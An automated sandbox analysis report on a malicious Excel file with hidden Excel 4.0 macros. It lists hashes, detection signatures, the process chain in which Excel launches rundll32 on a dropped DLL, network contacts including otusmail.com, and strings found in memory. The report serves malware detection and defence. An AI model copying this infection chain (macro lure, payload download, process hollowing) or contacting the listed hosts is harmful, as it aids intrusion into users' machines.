Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Documents_111651917_375818984.xls

Overview

General Information

Sample Name:Documents_111651917_375818984.xls
Analysis ID:403285
MD5:72526a505496a9b7da9a6c9651dbda5e
SHA1:84cf963666314eee0d8ad1ef09e5462a66e3ccbf
SHA256:3c20530c13d6736ec705786d1694052b2abf42bf87d3bbc359ea95b343fcf681
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects a PE file into a foreign processes
Office process drops PE file
Sample uses process hollowing technique
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4944 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4744 cmdline: rundll32 ..\bsdnbsej.dbw,PluginInit MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 4928 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Documents_111651917_375818984.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x165c5:$e1: Enable Editing
  • 0x1630f:$e3: Enable editing
  • 0x163e1:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 104.21.64.132:443 -> 192.168.2.4:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.222.240.99:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.163.9.216:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: dnsapi.pdbUGP source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: wininet.pdb source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb source: vegas[1].dll.0.dr
Source: Binary string: bcrypt.pdb source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdb source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: msi.pdbUGP source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: ole32.pdbUGP source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb@ source: vegas[1].dll.0.dr
Source: Binary string: ole32.pdb source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: msi.pdb source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdbUGP source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: Binary string: bcrypt.pdbGCTL source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbUGP source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: netapi32.pdb source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbUGP source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: netapi32.pdbUGP source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: wininet.pdbUGP source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: shell32.pdbUGP source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdb source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67335D36 FindFirstFileExW,

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: vegas[1].dll.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: otusmail.com
Source: global trafficTCP traffic: 192.168.2.4:49709 -> 104.21.64.132:443
Source: global trafficTCP traffic: 192.168.2.4:49709 -> 104.21.64.132:443
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownTCP traffic detected without corresponding DNS query: 18.222.240.99
Source: unknownDNS traffic detected: queries for: otusmail.com
Source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpString found in binary or memory: http://.css
Source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpString found in binary or memory: http://.jpg
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp, cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp, rundll32.exe, 00000001.00000003.781100347.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?54c45430557b4
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrl1.3.6.1.4.1.311.2.4.
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpString found in binary or memory: http://html4/loose.dtd
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es00
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.anf.es
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.eme.lv/repository0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
